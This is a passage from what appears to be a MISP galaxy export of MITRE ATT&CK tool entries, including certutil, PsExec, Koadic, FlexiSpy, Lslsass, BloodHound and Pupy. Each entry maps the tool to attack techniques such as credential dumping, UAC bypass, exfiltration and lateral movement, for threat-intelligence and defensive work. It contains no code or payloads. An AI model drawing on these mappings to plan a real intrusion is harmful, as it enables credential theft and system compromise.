cmd - S0106 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 5166. Table References
Links
https://attack.mitre.org/software/S0106
https://technet.microsoft.com/en-us/library/bb490880.aspx
https://technet.microsoft.com/en-us/library/cc755121.aspx
https://technet.microsoft.com/en-us/library/cc771049.aspx
https://technet.microsoft.com/en-us/library/bb490886.aspx

certutil - S0160

[certutil](https://attack.mitre.org/software/S0160) is a command-line utility that can be used to obtain certificate authority information and configure Certificate Services. (Citation: TechNet Certutil)

The tag is: misp-galaxy:mitre-tool="certutil - S0160"

certutil - S0160 is also known as:

certutil
certutil.exe

View relationships graph

certutil - S0160 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1553.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 5167. Table References
Links
https://attack.mitre.org/software/S0160
https://technet.microsoft.com/library/cc732443.aspx

netsh - S0108

[netsh](https://attack.mitre.org/software/S0108) is a scripting utility used to interact with networking components on local or remote systems. (Citation: TechNet Netsh)

The tag is: misp-galaxy:mitre-tool="netsh - S0108"

netsh - S0108 is also known as:

netsh
netsh.exe

View relationships graph

netsh - S0108 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Netsh Helper DLL - T1546.007" with estimative-language:likelihood-probability="almost-certain"

Table 5168. Table References
Links
https://attack.mitre.org/software/S0108
https://technet.microsoft.com/library/bb490939.aspx

BITSAdmin - S0190

[BITSAdmin](https://attack.mitre.org/software/S0190) is a command line tool used to create and manage [BITS Jobs](https://attack.mitre.org/techniques/T1197). (Citation: Microsoft BITSAdmin)

The tag is: misp-galaxy:mitre-tool="BITSAdmin - S0190"

BITSAdmin - S0190 is also known as:

BITSAdmin

View relationships graph

BITSAdmin - S0190 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"

Table 5169. Table References
Links
https://attack.mitre.org/software/S0190
https://msdn.microsoft.com/library/aa362813.aspx

Koadic - S0250

[Koadic](https://attack.mitre.org/software/S0250) is a Windows post-exploitation framework and penetration testing tool. [Koadic](https://attack.mitre.org/software/S0250) is publicly available on GitHub and the tool is executed via the command-line. [Koadic](https://attack.mitre.org/software/S0250) has several options for staging payloads and creating implants. [Koadic](https://attack.mitre.org/software/S0250) performs most of its operations using Windows Script Host. (Citation: Github Koadic) (Citation: Palo Alto Sofacy 06-2018)

The tag is: misp-galaxy:mitre-tool="Koadic - S0250"

Koadic - S0250 is also known as:

Koadic

View relationships graph

Koadic - S0250 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 5170. Table References
Links
https://attack.mitre.org/software/S0250
https://github.com/zerosum0x0/koadic
https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/

PsExec - S0029

[PsExec](https://attack.mitre.org/software/S0029) is a free Microsoft tool that can be used to execute a program on another computer. It is used by IT administrators and attackers. (Citation: Russinovich Sysinternals) (Citation: SANS PsExec)

The tag is: misp-galaxy:mitre-tool="PsExec - S0029"

PsExec - S0029 is also known as:

PsExec

View relationships graph

PsExec - S0029 has relationships with:

similar: misp-galaxy:tool="PsExec" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1136.002" with estimative-language:likelihood-probability="almost-certain"

Table 5171. Table References
Links
https://attack.mitre.org/software/S0029
https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
https://digital-forensics.sans.org/blog/2012/12/17/protecting-privileged-domain-accounts-psexec-deep-dive

Net - S0039

The [Net](https://attack.mitre.org/software/S0039) utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. (Citation: Microsoft Net Utility)

[Net](https://attack.mitre.org/software/S0039) has a great deal of functionality, (Citation: Savill 1999) much of which is useful for an adversary, such as gathering system and network information for Discovery, moving laterally through [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) using <code>net use</code> commands, and interacting with services. The net1.exe utility is executed for certain functionality when net.exe is run and can be used directly in commands such as <code>net1 user</code>.

The tag is: misp-galaxy:mitre-tool="Net - S0039"

Net - S0039 is also known as:

Net
net.exe

View relationships graph

Net - S0039 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Policy Discovery - T1201" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Connection Removal - T1070.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1136.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

Table 5172. Table References
Links
https://attack.mitre.org/software/S0039
https://msdn.microsoft.com/en-us/library/aa939914
http://windowsitpro.com/windows/netexe-reference

esentutl - S0404

[esentutl](https://attack.mitre.org/software/S0404) is a command-line tool that provides database utilities for the Windows Extensible Storage Engine.(Citation: Microsoft Esentutl)

The tag is: misp-galaxy:mitre-tool="esentutl - S0404"

esentutl - S0404 is also known as:

esentutl
esentutl.exe

View relationships graph

esentutl - S0404 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

Table 5173. Table References
Links
https://attack.mitre.org/software/S0404
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/hh875546(v=ws.11)

FlexiSpy - S0408

[FlexiSpy](https://attack.mitre.org/software/S0408) is sophisticated surveillanceware for iOS and Android. Publicly-available, comprehensive analysis has only been found for the Android version.(Citation: FortiGuard-FlexiSpy)(Citation: CyberMerchants-FlexiSpy)

[FlexiSpy](https://attack.mitre.org/software/S0408) markets itself as a parental control and employee monitoring application.(Citation: FlexiSpy-Website)

The tag is: misp-galaxy:mitre-tool="FlexiSpy - S0408"

FlexiSpy - S0408 is also known as:

FlexiSpy

View relationships graph

FlexiSpy - S0408 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1509" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1508" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify System Partition - T1400" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Stored Application Data - T1409" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Delete Device Data - T1447" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Calendar Entries - T1435" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Information Discovery - T1507" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1513" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Capture - T1417" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"

Table 5174. Table References
Links
https://attack.mitre.org/software/S0408
https://d3gpjj9d20n0p3.cloudfront.net/fortiguard/research/Dig%20Deep%20into%20FlexiSpy%20for%20Android%28white%20paper%29_KaiLu.pdf
http://www.cybermerchantsofdeath.com/blog/2017/04/22/FlexiSpy.html
https://www.flexispy.com/

Reg - S0075

[Reg](https://attack.mitre.org/software/S0075) is a Windows utility used to interact with the Windows Registry. It can be used at the command-line interface to query, add, modify, and remove information. (Citation: Microsoft Reg)

Utilities such as [Reg](https://attack.mitre.org/software/S0075) are known to be used by persistent threats. (Citation: Windows Commands JPCERT)

The tag is: misp-galaxy:mitre-tool="Reg - S0075"

Reg - S0075 is also known as:

Reg
reg.exe

View relationships graph

Reg - S0075 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 5175. Table References
Links
https://attack.mitre.org/software/S0075
https://technet.microsoft.com/en-us/library/cc732643.aspx
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

Tasklist - S0057

The [Tasklist](https://attack.mitre.org/software/S0057) utility displays a list of applications and services with their Process IDs (PID) for all tasks running on either a local or a remote computer. It is packaged with Windows operating systems and can be executed from the command-line interface. (Citation: Microsoft Tasklist)

The tag is: misp-galaxy:mitre-tool="Tasklist - S0057"

Tasklist - S0057 is also known as:

Tasklist

View relationships graph

Tasklist - S0057 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 5176. Table References
Links
https://attack.mitre.org/software/S0057
https://technet.microsoft.com/en-us/library/bb491010.aspx

NBTscan - S0590

[NBTscan](https://attack.mitre.org/software/S0590) is an open source tool that has been used by state groups to conduct internal reconnaissance within a compromised network.(Citation: Debian nbtscan Nov 2019)(Citation: SecTools nbtscan June 2003)(Citation: Symantec Waterbug Jun 2019)(Citation: FireEye APT39 Jan 2019)

The tag is: misp-galaxy:mitre-tool="NBTscan - S0590"

NBTscan - S0590 is also known as:

NBTscan

View relationships graph

NBTscan - S0590 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"

Table 5177. Table References
Links
https://attack.mitre.org/software/S0590
https://manpages.debian.org/testing/nbtscan/nbtscan.1.en.html
https://sectools.org/tool/nbtscan/
https://www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments
https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html

FTP - S0095

[FTP](https://attack.mitre.org/software/S0095) is a utility commonly available with operating systems to transfer information over the File Transfer Protocol (FTP). Adversaries can use it to transfer other tools onto a system or to exfiltrate data. (Citation: Wikipedia FTP)

The tag is: misp-galaxy:mitre-tool="FTP - S0095"

FTP - S0095 is also known as:

FTP
ftp.exe

View relationships graph

FTP - S0095 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"

Table 5178. Table References
Links
https://attack.mitre.org/software/S0095
https://en.wikipedia.org/wiki/File_Transfer_Protocol

Systeminfo - S0096

[Systeminfo](https://attack.mitre.org/software/S0096) is a Windows utility that can be used to gather detailed information about a computer. (Citation: TechNet Systeminfo)

The tag is: misp-galaxy:mitre-tool="Systeminfo - S0096"

Systeminfo - S0096 is also known as:

systeminfo.exe
Systeminfo

View relationships graph

Systeminfo - S0096 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 5179. Table References
Links
https://attack.mitre.org/software/S0096
https://technet.microsoft.com/en-us/library/bb491007.aspx

Ping - S0097

[Ping](https://attack.mitre.org/software/S0097) is an operating system utility commonly used to troubleshoot and verify network connections. (Citation: TechNet Ping)

The tag is: misp-galaxy:mitre-tool="Ping - S0097"

Ping - S0097 is also known as:

ping.exe
Ping

View relationships graph

Ping - S0097 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

Table 5180. Table References
Links
https://attack.mitre.org/software/S0097
https://technet.microsoft.com/en-us/library/bb490968.aspx

Arp - S0099

[Arp](https://attack.mitre.org/software/S0099) displays information about a system’s Address Resolution Protocol (ARP) cache. (Citation: TechNet Arp)

The tag is: misp-galaxy:mitre-tool="Arp - S0099"

Arp - S0099 is also known as:

Arp
arp.exe

View relationships graph

Arp - S0099 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 5181. Table References
Links
https://attack.mitre.org/software/S0099
https://technet.microsoft.com/en-us/library/bb490864.aspx

schtasks - S0111

[schtasks](https://attack.mitre.org/software/S0111) is used to schedule execution of programs or scripts on a Windows system to run at a specific date and time. (Citation: TechNet Schtasks)

The tag is: misp-galaxy:mitre-tool="schtasks - S0111"

schtasks - S0111 is also known as:

schtasks
schtasks.exe

View relationships graph

schtasks - S0111 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 5182. Table References
Links
https://attack.mitre.org/software/S0111
https://technet.microsoft.com/en-us/library/bb490996.aspx

Lslsass - S0121

[Lslsass](https://attack.mitre.org/software/S0121) is a publicly-available tool that can dump active logon session password hashes from the lsass process. (Citation: Mandiant APT1)

The tag is: misp-galaxy:mitre-tool="Lslsass - S0121"

Lslsass - S0121 is also known as:

Lslsass

View relationships graph

Lslsass - S0121 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 5183. Table References
Links
https://attack.mitre.org/software/S0121
https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

UACMe - S0116

[UACMe](https://attack.mitre.org/software/S0116) is an open source assessment tool that contains many methods for bypassing Windows User Account Control on multiple versions of the operating system. (Citation: Github UACMe)

The tag is: misp-galaxy:mitre-tool="UACMe - S0116"

UACMe - S0116 is also known as:

UACMe

View relationships graph

UACMe - S0116 has relationships with:

similar: misp-galaxy:malpedia="UACMe" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 5184. Table References
Links
https://attack.mitre.org/software/S0116
https://github.com/hfiref0x/UACME

Cachedump - S0119

[Cachedump](https://attack.mitre.org/software/S0119) is a publicly-available tool that program extracts cached password hashes from a system’s registry. (Citation: Mandiant APT1)

The tag is: misp-galaxy:mitre-tool="Cachedump - S0119"

Cachedump - S0119 is also known as:

Cachedump

View relationships graph

Cachedump - S0119 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"

Table 5185. Table References
Links
https://attack.mitre.org/software/S0119
https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

Winexe - S0191

[Winexe](https://attack.mitre.org/software/S0191) is a lightweight, open source tool similar to [PsExec](https://attack.mitre.org/software/S0029) designed to allow system administrators to execute commands on remote servers. (Citation: Winexe Github Sept 2013) [Winexe](https://attack.mitre.org/software/S0191) is unique in that it is a GNU/Linux based client. (Citation: Überwachung APT28 Forfiles June 2015)

The tag is: misp-galaxy:mitre-tool="Winexe - S0191"

Winexe - S0191 is also known as:

Winexe

View relationships graph

Winexe - S0191 has relationships with:

similar: misp-galaxy:tool="Winexe" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 5186. Table References
Links
https://attack.mitre.org/software/S0191
https://github.com/skalkoto/winexe/
https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/

xCmd - S0123

[xCmd](https://attack.mitre.org/software/S0123) is an open source tool that is similar to [PsExec](https://attack.mitre.org/software/S0029) and allows the user to execute applications on remote systems. (Citation: xCmd)

The tag is: misp-galaxy:mitre-tool="xCmd - S0123"

xCmd - S0123 is also known as:

xCmd

View relationships graph

xCmd - S0123 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 5187. Table References
Links
https://attack.mitre.org/software/S0123
https://ashwinrayaprolu.wordpress.com/2011/04/12/xcmd-an-alternative-to-psexec/

BloodHound - S0521

[BloodHound](https://attack.mitre.org/software/S0521) is an Active Directory (AD) reconnaissance tool that can reveal hidden relationships and identify attack paths within an AD environment.(Citation: GitHub Bloodhound)(Citation: CrowdStrike BloodHound April 2018)(Citation: FoxIT Wocao December 2019)

The tag is: misp-galaxy:mitre-tool="BloodHound - S0521"

BloodHound - S0521 is also known as:

BloodHound

View relationships graph

BloodHound - S0521 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Policy Discovery - T1201" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Group Policy Discovery - T1615" with estimative-language:likelihood-probability="almost-certain"

Table 5188. Table References
Links
https://attack.mitre.org/software/S0521
https://github.com/BloodHoundAD/BloodHound
https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/
https://resources.fox-it.com/rs/170-CAK-271/images/201912_Report_Operation_Wocao.pdf

Pupy - S0192

[Pupy](https://attack.mitre.org/software/S0192) is an open source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool. (Citation: GitHub Pupy) It is written in Python and can be generated as a payload in several different ways (Windows exe, Python file, PowerShell oneliner/file, Linux elf, APK, Rubber Ducky, etc.). (Citation: GitHub Pupy) [Pupy](https://attack.mitre.org/software/S0192) is publicly available on GitHub. (Citation: GitHub Pupy)

The tag is: misp-galaxy:mitre-tool="Pupy - S0192"

Pupy - S0192 is also known as:

Pupy

View relationships graph

Pupy - S0192 has relationships with:

similar: misp-galaxy:rat="Pupy" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Email Collection - T1114.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"
